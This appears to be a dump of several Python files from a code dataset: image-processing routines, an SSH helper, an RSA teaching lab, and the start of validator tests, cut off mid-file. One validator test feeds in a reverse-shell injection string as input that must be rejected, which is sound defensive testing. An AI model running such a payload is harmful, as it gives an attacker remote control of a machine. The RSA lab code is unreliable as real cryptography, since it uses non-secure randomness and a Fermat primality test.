import argparse import os import sys import tifffile.tifffile as tf import numpy as np _description = """Normalizes image stacks against background. Uses background.tif if it already exists in the current working directory; otherwise, computes the background image at each (x,y) location as the 5th percentile of that location's value over the image stack. """ def main(): parser = argparse.ArgumentParser(description=_description) parser.add_argument('--output', '-o', metavar='normalized.tif', default='normalized.tif', help='Output filename') parser.add_argument( '--subtract', action='store_true', help='Subtract background instead of dividing and truncating') parser.add_argument('infile') args = parser.parse_args() infile = args.infile print 'Reading image stack' t = tf.TiffFile(infile) ar = tf.stack_pages(t.pages) n = ar.shape[0] percentile = 0.01 if args.subtract else 0.05 if os.path.exists('background.tif'): print 'Reading background image' bg = tf.imread('background.tif') else: print 'Computing background image' sorted_ar = ar.copy() sorted_ar.sort(0) bg = sorted_ar[int(round(percentile*n, 0))] print 'Saving background image' tf.imsave('background.tif', bg) del sorted_ar print 'Performing background normalization' if not args.subtract: ar = ar.astype(np.double) for i in range(n): ar[i] /= bg print 'Converting to 16-bit TIFF' max_normed = (4095.0 / bg.min()) - 1 ar -= 1 ar *= 65535 ar /= max_normed ar = ar.round() else: ar = ar.astype(np.int16) for i in range(n): ar[i] -= bg ar[ar < 0] = 0 ar = ar.astype(np.uint16) print 'Writing normalized image' with tf.TiffWriter(args.output) as out: for i in range(n): if (i % 100) == 0: print i, sys.stdout.flush() out.save(ar[i]) print if __name__ == "__main__": main()
elisa/normalize_bg.py
import argparse import os import sys import tifffile.tifffile as tf import numpy as np _description = """Normalizes image stacks against background. Uses background.tif if it already exists in the current working directory; otherwise, computes the background image at each (x,y) location as the 5th percentile of that location's value over the image stack. """ def main(): parser = argparse.ArgumentParser(description=_description) parser.add_argument('--output', '-o', metavar='normalized.tif', default='normalized.tif', help='Output filename') parser.add_argument( '--subtract', action='store_true', help='Subtract background instead of dividing and truncating') parser.add_argument('infile') args = parser.parse_args() infile = args.infile print 'Reading image stack' t = tf.TiffFile(infile) ar = tf.stack_pages(t.pages) n = ar.shape[0] percentile = 0.01 if args.subtract else 0.05 if os.path.exists('background.tif'): print 'Reading background image' bg = tf.imread('background.tif') else: print 'Computing background image' sorted_ar = ar.copy() sorted_ar.sort(0) bg = sorted_ar[int(round(percentile*n, 0))] print 'Saving background image' tf.imsave('background.tif', bg) del sorted_ar print 'Performing background normalization' if not args.subtract: ar = ar.astype(np.double) for i in range(n): ar[i] /= bg print 'Converting to 16-bit TIFF' max_normed = (4095.0 / bg.min()) - 1 ar -= 1 ar *= 65535 ar /= max_normed ar = ar.round() else: ar = ar.astype(np.int16) for i in range(n): ar[i] -= bg ar[ar < 0] = 0 ar = ar.astype(np.uint16) print 'Writing normalized image' with tf.TiffWriter(args.output) as out: for i in range(n): if (i % 100) == 0: print i, sys.stdout.flush() out.save(ar[i]) print if __name__ == "__main__": main()
0.395484
0.213767
import numpy as np import cupy as cp import cupyx.scipy.ndimage as cpndi from .mathtools import wrapToPi def cuGPA(image, kvec, sigma=22): """Perform spatial lock-in on an image GPU version of `optGPA()`. Parameters ---------- image : np.array 2D image input image kvec : 2-tuple or array of float components of the reference k-vector sigma : float, default=22 standard deviation/ width of the Gaussian window Returns ------- res : np.array, dtype complex Complex lock-in signal. Same shape as `image`. Notes ----- This function should be a prime candidate to speed up using cupy. """ xx, yy = cp.ogrid[0:image.shape[0], 0:image.shape[1]] multiplier = cp.exp(np.pi*2j * (xx*kvec[0] + yy*kvec[1])) X = cp.fft.fft2(cp.asarray(image) * multiplier) res = cp.fft.ifft2(cpndi.fourier_gaussian(X, sigma=sigma)) return res def wfr2_grad_opt(image, sigma, kx, ky, kw, kstep, grad=None): """Optimized version of wfr2_grad. In addition to returning the used k-vector and lock-in signal, return the gradient of the lock-in signal as well, for each pixel computed from the values of the surrounding pixels of the GPA of the best k-vector. Slightly more accurate, determination of this gradient, as boundary effects are mitigated. 
""" xx, yy = cp.ogrid[0:image.shape[0], 0:image.shape[1]] c_image = cp.asarray(image) g = {'w': cp.zeros(image.shape + (2,)), 'lockin': cp.zeros_like(c_image, dtype=np.complex128), 'grad': cp.zeros(image.shape + (2,)), } gaussian = cpndi.fourier_gaussian(cp.ones_like(c_image), sigma=sigma) if grad == 'diff': def grad_func(phase): dbdx = cp.diff(phase, axis=0, append=np.nan) dbdy = cp.diff(phase, axis=1, append=np.nan) return dbdx, dbdy elif grad is None: def grad_func(phase): return cp.gradient(phase) else: grad_func = grad for wx in np.arange(kx-kw, kx+kw, kstep): for wy in np.arange(ky-kw, ky+kw, kstep): multiplier = cp.exp(np.pi*2j * (xx*wx + yy*wy)) X = cp.fft.fft2(c_image * multiplier) X = X * gaussian sf = cp.fft.ifft2(X) t = cp.abs(sf) > cp.abs(g['lockin']) g['lockin'] = cp.where(t, sf * cp.exp(-2j*np.pi*((wx-kx)*xx + (wy-ky)*yy)), g['lockin']) g['w'] = cp.where(t[..., None], cp.array([wx, wy]), g['w']) angle = -cp.angle(sf) grad = grad_func(angle) grad = cp.stack(grad, axis=-1) # TODO: do outside forloop. g['grad'] = cp.where(t[..., None], grad + 2*np.pi * cp.array([(wx-kx), (wy-ky)]), g['grad']) for key in g.keys(): g[key] = g[key].get() g['w'] = np.moveaxis(g['w'], -1, 0) g['grad'] = wrapToPi(2 * g['grad']) / 2 return g def wfr2_grad_single(image, sigma, kx, ky, kw, kstep, grad=None): """Optimized, single precision version of wfr2_grad. Single precision might be faster on some hardware. In addition to returning the used k-vector and lock-in signal, return the gradient of the lock-in signal as well, for each pixel computed from the values of the surrounding pixels of the GPA of the best k-vector. Slightly more accurate, determination of this gradient, as boundary effects are mitigated. 
""" xx, yy = cp.ogrid[0:image.shape[0], 0:image.shape[1]] c_image = cp.asarray(image, dtype=np.float32) g = {'lockin': cp.zeros_like(c_image, dtype=np.complex64), 'grad': cp.zeros(image.shape + (2,), dtype=np.float32), } gaussian = cpndi.fourier_gaussian(cp.ones_like(c_image, dtype=np.float32), sigma=sigma) if grad == 'diff': def grad_func(phase): dbdx = cp.diff(phase, axis=0, append=np.nan) dbdy = cp.diff(phase, axis=1, append=np.nan) return dbdx, dbdy elif grad is None: def grad_func(phase): return cp.gradient(phase) else: grad_func = grad for wx in np.arange(kx-kw, kx+kw, kstep): for wy in np.arange(ky-kw, ky+kw, kstep): multiplier = cp.exp(np.pi*2j * (xx*wx + yy*wy)) X = cp.fft.fft2(c_image * multiplier) X = X * gaussian sf = cp.fft.ifft2(X) t = cp.abs(sf) > cp.abs(g['lockin']) angle = -cp.angle(sf) grad = grad_func(angle) grad = cp.stack(grad, axis=-1) g['lockin'] = cp.where(t, sf * cp.exp(-2j*np.pi*((wx-kx)*xx + (wy-ky)*yy)), g['lockin']) # TODO: do outside forloop. g['grad'] = cp.where(t[..., None], grad + 2*np.pi * cp.array([(wx-kx), (wy-ky)]), g['grad']) for key in g.keys(): g[key] = g[key].get() g['grad'] = wrapToPi(2 * g['grad']) / 2 return g def cuwfr2_only_lockin(image, sigma, kvec, kw, kstep): """Optimized version of wfr2 calculating only the lock-in signal. Optimization in amount of computation done in each step by only computing updated values. """ kx, ky = kvec xx, yy = cp.ogrid[0:image.shape[0], 0:image.shape[1]] c_image = cp.asarray(image) g = cp.zeros_like(c_image, dtype=np.complex) gaussian = cpndi.fourier_gaussian(cp.ones_like(c_image), sigma=sigma) for wx in np.arange(kx-kw, kx+kw, kstep): for wy in np.arange(ky-kw, ky+kw, kstep): multiplier = cp.exp(np.pi*2j * (xx*wx + yy*wy)) X = cp.fft.fft2(c_image * multiplier) X = X * gaussian sf = cp.fft.ifft2(X) t = cp.abs(sf) > cp.abs(g) g = cp.where(t, sf * cp.exp(-2j*np.pi*((wx-kx)*xx + (wy-ky)*yy)), g) g = g.get() return g
pyGPA/cuGPA.py
import numpy as np import cupy as cp import cupyx.scipy.ndimage as cpndi from .mathtools import wrapToPi def cuGPA(image, kvec, sigma=22): """Perform spatial lock-in on an image GPU version of `optGPA()`. Parameters ---------- image : np.array 2D image input image kvec : 2-tuple or array of float components of the reference k-vector sigma : float, default=22 standard deviation/ width of the Gaussian window Returns ------- res : np.array, dtype complex Complex lock-in signal. Same shape as `image`. Notes ----- This function should be a prime candidate to speed up using cupy. """ xx, yy = cp.ogrid[0:image.shape[0], 0:image.shape[1]] multiplier = cp.exp(np.pi*2j * (xx*kvec[0] + yy*kvec[1])) X = cp.fft.fft2(cp.asarray(image) * multiplier) res = cp.fft.ifft2(cpndi.fourier_gaussian(X, sigma=sigma)) return res def wfr2_grad_opt(image, sigma, kx, ky, kw, kstep, grad=None): """Optimized version of wfr2_grad. In addition to returning the used k-vector and lock-in signal, return the gradient of the lock-in signal as well, for each pixel computed from the values of the surrounding pixels of the GPA of the best k-vector. Slightly more accurate, determination of this gradient, as boundary effects are mitigated. 
""" xx, yy = cp.ogrid[0:image.shape[0], 0:image.shape[1]] c_image = cp.asarray(image) g = {'w': cp.zeros(image.shape + (2,)), 'lockin': cp.zeros_like(c_image, dtype=np.complex128), 'grad': cp.zeros(image.shape + (2,)), } gaussian = cpndi.fourier_gaussian(cp.ones_like(c_image), sigma=sigma) if grad == 'diff': def grad_func(phase): dbdx = cp.diff(phase, axis=0, append=np.nan) dbdy = cp.diff(phase, axis=1, append=np.nan) return dbdx, dbdy elif grad is None: def grad_func(phase): return cp.gradient(phase) else: grad_func = grad for wx in np.arange(kx-kw, kx+kw, kstep): for wy in np.arange(ky-kw, ky+kw, kstep): multiplier = cp.exp(np.pi*2j * (xx*wx + yy*wy)) X = cp.fft.fft2(c_image * multiplier) X = X * gaussian sf = cp.fft.ifft2(X) t = cp.abs(sf) > cp.abs(g['lockin']) g['lockin'] = cp.where(t, sf * cp.exp(-2j*np.pi*((wx-kx)*xx + (wy-ky)*yy)), g['lockin']) g['w'] = cp.where(t[..., None], cp.array([wx, wy]), g['w']) angle = -cp.angle(sf) grad = grad_func(angle) grad = cp.stack(grad, axis=-1) # TODO: do outside forloop. g['grad'] = cp.where(t[..., None], grad + 2*np.pi * cp.array([(wx-kx), (wy-ky)]), g['grad']) for key in g.keys(): g[key] = g[key].get() g['w'] = np.moveaxis(g['w'], -1, 0) g['grad'] = wrapToPi(2 * g['grad']) / 2 return g def wfr2_grad_single(image, sigma, kx, ky, kw, kstep, grad=None): """Optimized, single precision version of wfr2_grad. Single precision might be faster on some hardware. In addition to returning the used k-vector and lock-in signal, return the gradient of the lock-in signal as well, for each pixel computed from the values of the surrounding pixels of the GPA of the best k-vector. Slightly more accurate, determination of this gradient, as boundary effects are mitigated. 
""" xx, yy = cp.ogrid[0:image.shape[0], 0:image.shape[1]] c_image = cp.asarray(image, dtype=np.float32) g = {'lockin': cp.zeros_like(c_image, dtype=np.complex64), 'grad': cp.zeros(image.shape + (2,), dtype=np.float32), } gaussian = cpndi.fourier_gaussian(cp.ones_like(c_image, dtype=np.float32), sigma=sigma) if grad == 'diff': def grad_func(phase): dbdx = cp.diff(phase, axis=0, append=np.nan) dbdy = cp.diff(phase, axis=1, append=np.nan) return dbdx, dbdy elif grad is None: def grad_func(phase): return cp.gradient(phase) else: grad_func = grad for wx in np.arange(kx-kw, kx+kw, kstep): for wy in np.arange(ky-kw, ky+kw, kstep): multiplier = cp.exp(np.pi*2j * (xx*wx + yy*wy)) X = cp.fft.fft2(c_image * multiplier) X = X * gaussian sf = cp.fft.ifft2(X) t = cp.abs(sf) > cp.abs(g['lockin']) angle = -cp.angle(sf) grad = grad_func(angle) grad = cp.stack(grad, axis=-1) g['lockin'] = cp.where(t, sf * cp.exp(-2j*np.pi*((wx-kx)*xx + (wy-ky)*yy)), g['lockin']) # TODO: do outside forloop. g['grad'] = cp.where(t[..., None], grad + 2*np.pi * cp.array([(wx-kx), (wy-ky)]), g['grad']) for key in g.keys(): g[key] = g[key].get() g['grad'] = wrapToPi(2 * g['grad']) / 2 return g def cuwfr2_only_lockin(image, sigma, kvec, kw, kstep): """Optimized version of wfr2 calculating only the lock-in signal. Optimization in amount of computation done in each step by only computing updated values. """ kx, ky = kvec xx, yy = cp.ogrid[0:image.shape[0], 0:image.shape[1]] c_image = cp.asarray(image) g = cp.zeros_like(c_image, dtype=np.complex) gaussian = cpndi.fourier_gaussian(cp.ones_like(c_image), sigma=sigma) for wx in np.arange(kx-kw, kx+kw, kstep): for wy in np.arange(ky-kw, ky+kw, kstep): multiplier = cp.exp(np.pi*2j * (xx*wx + yy*wy)) X = cp.fft.fft2(c_image * multiplier) X = X * gaussian sf = cp.fft.ifft2(X) t = cp.abs(sf) > cp.abs(g) g = cp.where(t, sf * cp.exp(-2j*np.pi*((wx-kx)*xx + (wy-ky)*yy)), g) g = g.get() return g
0.762601
0.590573
import numpy as np import numpy.ma as ma from math import hypot from filters import get_filters get_filters(globals()) # imports all filters at once def comp_range(blob): # compare rng-distant pixels within blob: a component of intra_blob rng = blob.rng + 1 p__ = ma.array(blob.dert__[:, :, 0], mask=~blob.map) # apply mask = ~map dy__ = ma.array(blob.dert__[:, :, 1], mask=~blob.map) dx__ = ma.array(blob.dert__[:, :, 2], mask=~blob.map) dert__ = ma.empty(shape=(height, width, 4), dtype=int) # initialize new dert__ comp_rng = rng * 2 # vertical comp: d__ = p__[comp_rng:, rng:-rng] - p__[:-comp_rng, rng:-rng] # bilateral comparison between p at coordinates (x, y + rng) and p at coordinates (x, y - rng) dy__[rng:-rng, rng:-rng] += d__ # bilateral accumulation on dy (x, y) # horizontal comp: d__ = p__[rng:-rng, comp_rng:] - p__[rng:-rng, :-comp_rng] # bilateral comparison between p at coordinates (x + rng, y) and p at coordinates (x - rng, y) dx__[rng:-rng, rng:-rng] += d__ # bilateral accumulation on dy (x, y) # diagonal comparison: for xd in range(1, rng): yd = rng - xd # half y and x distance between comparands bi_xd = xd * 2 bi_yd = comp_rng - bi_xd # y and x distance between comparands hyp = hypot(bi_yd, bi_xd) y_coef = bi_yd / hyp # to decompose d into dy x_coef = bi_xd / hyp # to decompose d into dx # top-left and bottom-right quadrants: d__ = p__[bi_yd:, bi_xd:] - p__[:-bi_yd, :-bi_xd] # comparison between p (x - xd, y - yd) and p (x + xd, y + yd) # decompose d to dy, dx: temp_dy__ = d__ * y_coef # buffer for dy accumulation temp_dx__ = d__ * x_coef # buffer for dx accumulation # accumulate dy, dx: dy__[yd:-yd, xd:-xd] += temp_dy__.astype(int) # bilateral accumulation on dy (x, y) dx__[yd:-yd, xd:-xd] += temp_dx__.astype(int) # bilateral accumulation on dx (x, y) # top-right and bottom-left quadrants: d__ = p__[bi_yd:, :-bi_xd] - p__[:-bi_yd, bi_xd:] # comparison between p (x + xd, y - yd) and p (x - xd, y + yd) # decompose d to dy, dx: temp_dy__ = d__ * y_coef # 
buffer for dy accumulation temp_dx__ = -(d__ * x_coef) # buffer for dx accumulation, sign inverted with comp direction # accumulate dy, dx: dy__[yd:-yd, xd:-xd] += temp_dy__.astype(int) # bilateral accumulation on dy (x, y) dx__[yd:-yd, xd:-xd] += temp_dx__.astype(int) # bilateral accumulation on dx (x, y) g__ = np.hypot(dy__, dx__) - ave * blob.ncomp # compute g__ # pack all derts into dert__ dert__[:, :, 0] = p__ dert__[:, :, 1] = dy__ dert__[:, :, 2] = dx__ dert__[:, :, 3] = g__ blob.new_dert__[0] = dert__ # pack dert__ into blob return rng # ---------- inc_range() end ----------------------------------------------------------------------------------------
frame_2D_alg/comp_range.py
import numpy as np import numpy.ma as ma from math import hypot from filters import get_filters get_filters(globals()) # imports all filters at once def comp_range(blob): # compare rng-distant pixels within blob: a component of intra_blob rng = blob.rng + 1 p__ = ma.array(blob.dert__[:, :, 0], mask=~blob.map) # apply mask = ~map dy__ = ma.array(blob.dert__[:, :, 1], mask=~blob.map) dx__ = ma.array(blob.dert__[:, :, 2], mask=~blob.map) dert__ = ma.empty(shape=(height, width, 4), dtype=int) # initialize new dert__ comp_rng = rng * 2 # vertical comp: d__ = p__[comp_rng:, rng:-rng] - p__[:-comp_rng, rng:-rng] # bilateral comparison between p at coordinates (x, y + rng) and p at coordinates (x, y - rng) dy__[rng:-rng, rng:-rng] += d__ # bilateral accumulation on dy (x, y) # horizontal comp: d__ = p__[rng:-rng, comp_rng:] - p__[rng:-rng, :-comp_rng] # bilateral comparison between p at coordinates (x + rng, y) and p at coordinates (x - rng, y) dx__[rng:-rng, rng:-rng] += d__ # bilateral accumulation on dy (x, y) # diagonal comparison: for xd in range(1, rng): yd = rng - xd # half y and x distance between comparands bi_xd = xd * 2 bi_yd = comp_rng - bi_xd # y and x distance between comparands hyp = hypot(bi_yd, bi_xd) y_coef = bi_yd / hyp # to decompose d into dy x_coef = bi_xd / hyp # to decompose d into dx # top-left and bottom-right quadrants: d__ = p__[bi_yd:, bi_xd:] - p__[:-bi_yd, :-bi_xd] # comparison between p (x - xd, y - yd) and p (x + xd, y + yd) # decompose d to dy, dx: temp_dy__ = d__ * y_coef # buffer for dy accumulation temp_dx__ = d__ * x_coef # buffer for dx accumulation # accumulate dy, dx: dy__[yd:-yd, xd:-xd] += temp_dy__.astype(int) # bilateral accumulation on dy (x, y) dx__[yd:-yd, xd:-xd] += temp_dx__.astype(int) # bilateral accumulation on dx (x, y) # top-right and bottom-left quadrants: d__ = p__[bi_yd:, :-bi_xd] - p__[:-bi_yd, bi_xd:] # comparison between p (x + xd, y - yd) and p (x - xd, y + yd) # decompose d to dy, dx: temp_dy__ = d__ * y_coef # 
buffer for dy accumulation temp_dx__ = -(d__ * x_coef) # buffer for dx accumulation, sign inverted with comp direction # accumulate dy, dx: dy__[yd:-yd, xd:-xd] += temp_dy__.astype(int) # bilateral accumulation on dy (x, y) dx__[yd:-yd, xd:-xd] += temp_dx__.astype(int) # bilateral accumulation on dx (x, y) g__ = np.hypot(dy__, dx__) - ave * blob.ncomp # compute g__ # pack all derts into dert__ dert__[:, :, 0] = p__ dert__[:, :, 1] = dy__ dert__[:, :, 2] = dx__ dert__[:, :, 3] = g__ blob.new_dert__[0] = dert__ # pack dert__ into blob return rng # ---------- inc_range() end ----------------------------------------------------------------------------------------
0.464173
0.635873
from __future__ import absolute_import, division, unicode_literals, print_function, nested_scopes import getpass import logging from .cache import SSHConnectionCache, SSHNoConnectionCache MAXSSHBUF = 16 * 1024 g_no_cache = SSHNoConnectionCache() g_cmd_cache = SSHConnectionCache("SSH Command Cache") logger = logging.getLogger(__name__) def shell_escape_single_quote (command): """Escape single quotes for use in a shell single quoted string Explanation: (1) End first quotation which uses single quotes. (2) Start second quotation, using double-quotes. (3) Quoted character. (4) End second quotation, using double-quotes. (5) Start third quotation, using single quotes. If you do not place any whitespaces between (1) and (2), or between (4) and (5), the shell will interpret that string as a one long word """ return command.replace("'", "'\"'\"'") class SSHConnection (object): """A connection to an SSH server""" def __init__ (self, host, port=22, username=None, password=<PASSWORD>, debug=False, cache=None, proxycmd=None): if cache is None: cache = g_no_cache self.host = host self.port = port self.debug = debug self.cache = cache self.host_key = None self.chan = None self.ssh = None if not username: username = getpass.getuser() self.username = username self.ssh = cache.get_ssh_socket(host, port, username, password, debug, proxycmd) # Open a session. 
try: if self.debug: logger.debug("Opening SSH channel on socket (%s:%s)", self.host, str(self.port)) self.chan = self.ssh.open_session() except: self.close() raise def __del__ (self): # Make sure we get rid of the cached reference to the open ssh socket self.close() def close (self): if hasattr(self, "chan") and self.chan: if self.debug: logger.debug("Closing SSH channel on socket (%s:%s)", self.host, str(self.port)) self.chan.close() self.chan = None if hasattr(self, "ssh") and self.ssh: tmp = self.ssh self.ssh = None self.cache.release_ssh_socket(tmp, self.debug) def is_active (self): return self.chan and self.ssh and self.ssh.is_active() class SSHSession (SSHConnection): def send (self, chunk): assert self.chan is not None self.chan.send(chunk) def sendall (self, chunk): assert self.chan is not None self.chan.sendall(chunk) def recv (self, size=MAXSSHBUF): assert self.chan is not None return self.chan.recv(size) def recv_ready (self): assert self.chan is not None return self.chan.recv_ready() def recv_stderr (self, size=MAXSSHBUF): assert self.chan is not None return self.chan.recv_stderr(size) def recv_stderr_ready (self): assert self.chan is not None return self.chan.recv_stderr_ready() class SSHClientSession (SSHSession): """A client session to a host using a subsystem""" def __init__ (self, host, port, subsystem, username=None, password=<PASSWORD>, debug=False, cache=None, proxycmd=None): super(SSHClientSession, self).__init__(host, port, username, password, debug, cache, proxycmd) try: self.chan.invoke_subsystem(subsystem) except: self.close() raise class SSHCommandSession (SSHSession): """A client session to a host using a command i.e., like a remote pipe""" def __init__ (self, host, port, command, username=None, password=<PASSWORD>, debug=False, cache=None, proxycmd=None): if cache is None: cache = g_cmd_cache super(SSHCommandSession, self).__init__(host, port, username, password, debug, cache, proxycmd) try: self.chan.exec_command(command) except: 
self.close() raise __author__ = '<NAME>' __version__ = '1.0' __docformat__ = "restructuredtext en"
sshutil/conn.py
from __future__ import absolute_import, division, unicode_literals, print_function, nested_scopes import getpass import logging from .cache import SSHConnectionCache, SSHNoConnectionCache MAXSSHBUF = 16 * 1024 g_no_cache = SSHNoConnectionCache() g_cmd_cache = SSHConnectionCache("SSH Command Cache") logger = logging.getLogger(__name__) def shell_escape_single_quote (command): """Escape single quotes for use in a shell single quoted string Explanation: (1) End first quotation which uses single quotes. (2) Start second quotation, using double-quotes. (3) Quoted character. (4) End second quotation, using double-quotes. (5) Start third quotation, using single quotes. If you do not place any whitespaces between (1) and (2), or between (4) and (5), the shell will interpret that string as a one long word """ return command.replace("'", "'\"'\"'") class SSHConnection (object): """A connection to an SSH server""" def __init__ (self, host, port=22, username=None, password=<PASSWORD>, debug=False, cache=None, proxycmd=None): if cache is None: cache = g_no_cache self.host = host self.port = port self.debug = debug self.cache = cache self.host_key = None self.chan = None self.ssh = None if not username: username = getpass.getuser() self.username = username self.ssh = cache.get_ssh_socket(host, port, username, password, debug, proxycmd) # Open a session. 
try: if self.debug: logger.debug("Opening SSH channel on socket (%s:%s)", self.host, str(self.port)) self.chan = self.ssh.open_session() except: self.close() raise def __del__ (self): # Make sure we get rid of the cached reference to the open ssh socket self.close() def close (self): if hasattr(self, "chan") and self.chan: if self.debug: logger.debug("Closing SSH channel on socket (%s:%s)", self.host, str(self.port)) self.chan.close() self.chan = None if hasattr(self, "ssh") and self.ssh: tmp = self.ssh self.ssh = None self.cache.release_ssh_socket(tmp, self.debug) def is_active (self): return self.chan and self.ssh and self.ssh.is_active() class SSHSession (SSHConnection): def send (self, chunk): assert self.chan is not None self.chan.send(chunk) def sendall (self, chunk): assert self.chan is not None self.chan.sendall(chunk) def recv (self, size=MAXSSHBUF): assert self.chan is not None return self.chan.recv(size) def recv_ready (self): assert self.chan is not None return self.chan.recv_ready() def recv_stderr (self, size=MAXSSHBUF): assert self.chan is not None return self.chan.recv_stderr(size) def recv_stderr_ready (self): assert self.chan is not None return self.chan.recv_stderr_ready() class SSHClientSession (SSHSession): """A client session to a host using a subsystem""" def __init__ (self, host, port, subsystem, username=None, password=<PASSWORD>, debug=False, cache=None, proxycmd=None): super(SSHClientSession, self).__init__(host, port, username, password, debug, cache, proxycmd) try: self.chan.invoke_subsystem(subsystem) except: self.close() raise class SSHCommandSession (SSHSession): """A client session to a host using a command i.e., like a remote pipe""" def __init__ (self, host, port, command, username=None, password=<PASSWORD>, debug=False, cache=None, proxycmd=None): if cache is None: cache = g_cmd_cache super(SSHCommandSession, self).__init__(host, port, username, password, debug, cache, proxycmd) try: self.chan.exec_command(command) except: 
self.close() raise __author__ = '<NAME>' __version__ = '1.0' __docformat__ = "restructuredtext en"
0.626238
0.140013
import string import random import math import numpy as np from itertools import izip_longest from collections import namedtuple from fractions import gcd PublicKey = namedtuple("PublicKey", ['e', 'n']) PrivateKey = namedtuple("PrivateKey", ['d', 'n', 'phi_n']) def genkeys(bits, e): p = nextprime(random.getrandbits(bits//2)) q = nextprime(random.getrandbits(bits//2)) n = p * q pn = (p-1)*(q-1) e %= pn while gcd(e, pn) != 1 or e < 2: e = (e + 1) % pn d = modinv(e, pn) return PublicKey(e, n), PrivateKey(d, n, pn) def mod_nai(b, e, m): c = b loops = 0 largest = 0 for x in xrange(1, e): c = c * b largest = largest if c < largest else c c %= m loops += 1 return c, loops, largest def mod_sch(b, e, m): result = 1 b %= m loops = 0 while e > 0: if e % 2 == 1: result = (result * b) % m e >>= 1 b = (b * b) % m loops += 1 return result, loops def egcd(a, b): x,y, u,v = 0,1, 1,0 while a != 0: q, r = b//a, b%a m, n = x-u*q, y-v*q b,a, x,y, u,v = a,r, u,v, m,n gcd = b return gcd, x, y def modinv(a, m): gcd, x, y = egcd(a, m) if gcd != 1: return None # modular inverse does not exist else: return x % m def fermat(n): prime = set() for a in xrange(2, n): if pow(a, n-1, n) == 1: prime.add(a) return prime def witnessmap(n): r = (n-2)**.5 wm = np.zeros((r+1,r+1)) f = fermat(n) for i, _ in np.ndenumerate(wm.flat): if i[0]+2 < n: wm.flat[i] = 228 if i[0]+2 in f else 128 return wm def isprime(n, confidence=.99): err = 1 - confidence t = 0 while 1./pow(2, t) > err: a = random.randrange(2, n) if pow(a, n-1, n) != 1: return False t += 1 return True def nextprime(n, confidence=.99): while not isprime(n + 1): n += 1 return n + 1 def makeint(msg): newmsg = [] for c in msg: newmsg.append(str2int[c]) return ''.join(newmsg) def makestr(msg): newmsg = [] for c in msg[::2]: newmsg.append(int2str[c]) return ''.join(newmsg) def s2i(msg): #convert message to binary if not isinstance(msg, bytearray): msg = bytearray(msg) binmsg = [] for c in msg: binmsg.append(bin(c)[2:].zfill(8)) return 
int(''.join(binmsg), 2) def grouper(iterable, n, fillvalue=None): "Collect data into fixed-length chunks or blocks" # grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx args = [iter(iterable)] * n return izip_longest(fillvalue=fillvalue, *args) def i2s(msg): binmsg = bin(msg)[2:] binmsg = "0"*(8-(len(binmsg)%8)) + binmsg msg = bytearray() for block in grouper(binmsg, 8): msg.append(int(''.join(block), 2)) return msg def encrypt(key, message): m = s2i(message) if m.bit_length() > key.n.bit_length(): raise ValueError("Key must be at least {} bits to encrypt this message.".format(m.bit_length())) c = pow(m, key.e, key.n) return i2s(c) def decrypt(key, message): c = s2i(message) m = pow(c, key.d, key.n) return i2s(m)
Labs/RSA/solutions.py
import string import random import math import numpy as np from itertools import izip_longest from collections import namedtuple from fractions import gcd PublicKey = namedtuple("PublicKey", ['e', 'n']) PrivateKey = namedtuple("PrivateKey", ['d', 'n', 'phi_n']) def genkeys(bits, e): p = nextprime(random.getrandbits(bits//2)) q = nextprime(random.getrandbits(bits//2)) n = p * q pn = (p-1)*(q-1) e %= pn while gcd(e, pn) != 1 or e < 2: e = (e + 1) % pn d = modinv(e, pn) return PublicKey(e, n), PrivateKey(d, n, pn) def mod_nai(b, e, m): c = b loops = 0 largest = 0 for x in xrange(1, e): c = c * b largest = largest if c < largest else c c %= m loops += 1 return c, loops, largest def mod_sch(b, e, m): result = 1 b %= m loops = 0 while e > 0: if e % 2 == 1: result = (result * b) % m e >>= 1 b = (b * b) % m loops += 1 return result, loops def egcd(a, b): x,y, u,v = 0,1, 1,0 while a != 0: q, r = b//a, b%a m, n = x-u*q, y-v*q b,a, x,y, u,v = a,r, u,v, m,n gcd = b return gcd, x, y def modinv(a, m): gcd, x, y = egcd(a, m) if gcd != 1: return None # modular inverse does not exist else: return x % m def fermat(n): prime = set() for a in xrange(2, n): if pow(a, n-1, n) == 1: prime.add(a) return prime def witnessmap(n): r = (n-2)**.5 wm = np.zeros((r+1,r+1)) f = fermat(n) for i, _ in np.ndenumerate(wm.flat): if i[0]+2 < n: wm.flat[i] = 228 if i[0]+2 in f else 128 return wm def isprime(n, confidence=.99): err = 1 - confidence t = 0 while 1./pow(2, t) > err: a = random.randrange(2, n) if pow(a, n-1, n) != 1: return False t += 1 return True def nextprime(n, confidence=.99): while not isprime(n + 1): n += 1 return n + 1 def makeint(msg): newmsg = [] for c in msg: newmsg.append(str2int[c]) return ''.join(newmsg) def makestr(msg): newmsg = [] for c in msg[::2]: newmsg.append(int2str[c]) return ''.join(newmsg) def s2i(msg): #convert message to binary if not isinstance(msg, bytearray): msg = bytearray(msg) binmsg = [] for c in msg: binmsg.append(bin(c)[2:].zfill(8)) return 
int(''.join(binmsg), 2) def grouper(iterable, n, fillvalue=None): "Collect data into fixed-length chunks or blocks" # grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx args = [iter(iterable)] * n return izip_longest(fillvalue=fillvalue, *args) def i2s(msg): binmsg = bin(msg)[2:] binmsg = "0"*(8-(len(binmsg)%8)) + binmsg msg = bytearray() for block in grouper(binmsg, 8): msg.append(int(''.join(block), 2)) return msg def encrypt(key, message): m = s2i(message) if m.bit_length() > key.n.bit_length(): raise ValueError("Key must be at least {} bits to encrypt this message.".format(m.bit_length())) c = pow(m, key.e, key.n) return i2s(c) def decrypt(key, message): c = s2i(message) m = pow(c, key.d, key.n) return i2s(m)
0.325199
0.297732
from validator import ip_address, user_name, password, boolean, platform, MAX_PASSWD_LEN from shlex import quote import pytest @pytest.mark.parametrize('value', ['0.0.0.0', '255.255.255.255', '1.1.1.1']) def test_ip_address_must_not_raise_if_valid_value_provided(value): assert ip_address(value) == value @pytest.mark.parametrize('value', ['\'; /bin/bash -i &> /dev/tcp/8.8.8.8/8888 0<&1 #', '0.0.0', '1.1.1.1/24', '11a.22.22.22', '127.0.0.1']) def test_ip_address_must_raise_value_error_if_invalid_value_provided(value): with pytest.raises(ValueError): ip_address(value) def test_user_name_must_accept_only_root(): assert user_name('root') == 'root' @pytest.mark.parametrize('value', ['root1', 'asdf', 'name']) def test_user_name_must_allow_only_root(value): with pytest.raises(ValueError): user_name(value) def test_password_must_be_under_32_characters_len_instead_must_raise(): with pytest.raises(ValueError): password('*' * (MAX_PASSWD_LEN + 1)) @pytest.mark.parametrize('value, expected', [('*' * MAX_PASSWD_LEN, quote('*' * MAX_PASSWD_LEN)), 